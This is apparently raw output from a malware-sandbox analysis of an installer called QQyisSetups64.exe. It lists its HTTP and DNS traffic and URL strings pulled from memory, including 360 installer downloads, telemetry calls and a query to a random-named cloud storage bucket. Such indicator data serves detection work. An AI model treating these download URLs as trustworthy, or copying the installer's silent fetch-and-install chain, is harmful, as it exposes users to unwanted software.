Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /360safe/h_inst.cab?rd=10788264 HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: s.360.cn
Source: global traffic	DNS traffic detected: DNS query: st.p.360.cn
Source: global traffic	DNS traffic detected: DNS query: tr.p.360.cn
Source: global traffic	DNS traffic detected: DNS query: agt.p.360.cn
Source: global traffic	DNS traffic detected: DNS query: agd.p.360.cn
Source: global traffic	DNS traffic detected: DNS query: pinst.360.cn

Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://%s/%s.trt
Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://%s/%u%u.html
Source: inst.exe	String found in binary or memory: http://%s/gf/360ini.cab
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
Source: inst.exe	String found in binary or memory: http://%s/wpad.dat
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://123.com/
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
Source: inst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://360.cn
Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://agd.p.360.cn
Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C9F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1402669739.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2576898046.000002945F2A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: sites.dll.15.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: sites.dll.15.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: powershell.exe, 0000000C.00000002.1436414735.000000000845E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microqz
Source: powershell.exe, 0000000D.00000002.1402669739.00000000033A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000012.00000002.2576153550.000002945F200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: inst.exe	String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.dr	String found in binary or memory: http://dl.360safe.com/setup_13.0.0.2008k.exe
Source: inst.exe	String found in binary or memory: http://down.360safe.com/
Source: inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.000000000294F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.dr	String found in binary or memory: http://down.360safe.com/360safe/slideshow_new.cab
Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://down.360safe.com/h11=
Source: inst.exe	String found in binary or memory: http://down.360safe.com/setup.exe
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.dr	String found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
Source: inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://down.360safe.com/setup.exehttp://d
Source: inst.exe, 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmp, inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.dr	String found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
Source: inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh
Source: inst.exe	String found in binary or memory: http://down.360safe.com/setupbeta.exe
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.18.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.18.dr, qmgr.db.18.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://hao.360.com
Source: inst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: sites.dll.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: inst.exe	String found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php
Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php0cpsign1md5b3deb21a3401d8e933ddcb45a6c07222
Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
Source: inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab
Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264
Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264FK
Source: inst.exe, 0000000F.00000002.2575396513.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-
Source: inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hl
Source: inst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQ
Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:
Source: inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
Source: inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
Source: inst.exe	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10
Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
Source: inst.exe	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefin
Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefi
Source: inst.exe, 0000000F.00000002.2559394305.000000000081F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000003.1534492876.000000000293F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefi
Source: inst.exe, 0000000F.00000002.2559394305.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1533920373.0000000003891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefin
Source: inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1534492876.0000000002934000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefi
Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.0000000002936000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safef
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://s.symcd.com06
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.dr	String found in binary or memory: http://s2.symcb.com0
Source: 360P2SP.dll.15.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1427177445.0000000005214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
